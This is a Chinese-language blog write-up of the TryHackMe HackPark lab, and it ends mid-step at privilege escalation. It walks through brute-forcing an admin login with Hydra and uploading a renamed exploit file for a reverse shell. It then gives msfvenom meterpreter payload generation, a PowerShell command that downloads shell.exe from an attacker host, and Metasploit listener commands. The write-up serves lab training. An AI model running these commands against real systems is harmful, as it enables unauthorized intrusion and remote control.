TryHackMe | HackPark Writeup

发布时间 2023-07-11 22:36:56作者: L0VEhzzz

TryHackMe | HackPark Writeup

可以用autorecon进行波信息收集,可以自动联动nmap和gobuster,但是扫的时间很久

所以我就直接拿nmap扫了

image-20230711135237158

可以看到俩个开放端口 80 3389

Task 1 Deploy the vulnerable Windows machine

 

Whats the name of the clown displayed on the homepage?

访问网页给了个小丑的图片,图像搜索页面上的小丑图像会显示名称“Pennywise”

先记着,说不定可能是密码或者一个key

Task 2 Using Hydra to brute-force a login

 

类型POST

image-20230711160051522

 

标题提示我们要暴力破解密码

访问网页,右边有个折叠栏,点开最下面有个login,点击进入admin后台登入页面

然后进行抓包,流程就不掩饰了(默认大家都会)密码本用的是kali自带的,

image-20230711155211322

然后密码登入进入到后台

image-20230711160513698

点击about就可以看到这个cms的一些基本信息

image-20230711160613858

What is the CVE?

利用searchsploit寻找漏洞

image-20230711202359586

然后可以执行命令来查看该漏洞文件里的漏洞编号

image-20230711202339743

然后用vim编辑文件保存

第一个双引号是自己IP,第二个是端口,将修改后的文件重命名为PostView.ascx

这是因为在DNN平台中,这个文件名是默认的用户控件文件名,而且这个文件名也被硬编码在一些重要的DNN文件中。
因此,攻击者将上传的文件重命名为“PostView.ascx”,可以欺骗DNN平台认为这是一个合法的用户控件文件,并绕过了上传文件类型和文件名的验证。这样一来,攻击者可以成功地上传并执行恶意代码。

image-20230711202648104

然后来到那个后台界面,点击content进入后点New创建新的

img

然后点击最后一个按钮,上传刚刚我们的漏洞文件,上传成功后选中这个文件,取个标题,然后SAVE保存

image-20230711203218861

然后访问/?theme=../../App_Data/files后得到反弹shell,执行whoami获得答案

image-20230711204837167

Task 4 Windows Privilege Escalation

题目提示我们可以使用 msfvenom 生成另一个反向 shell,这就和上次Alfred的差不多

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.44.14  LPORT=6666 -f exe >shell.exe
powershell -c "Invoke-WebRequest -Uri 'http://10.11.44.141:80/shell.exe' -OutFile 'shell.exe'"

image-20230711205618017

一样的再shell.exe上用python命令python3 -m http.server 80 创建http服务

image-20230711210225793

再开启msfconsole,然后还是一样的命令监听

use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your-thm-ip
set LPORT listening-port //这里的port是你第二次shell文件上设置的端口
run

然后再获得的shell命令中下载我们的shell.exe,再执行

image-20230711213427728

image-20230711214717038

image-20230711214736403

执行sysinfo得到系统信息

image-20230711220553154

提权

使用 Meterpreter 上传命令上传 WinPEAS 枚举可执行文件: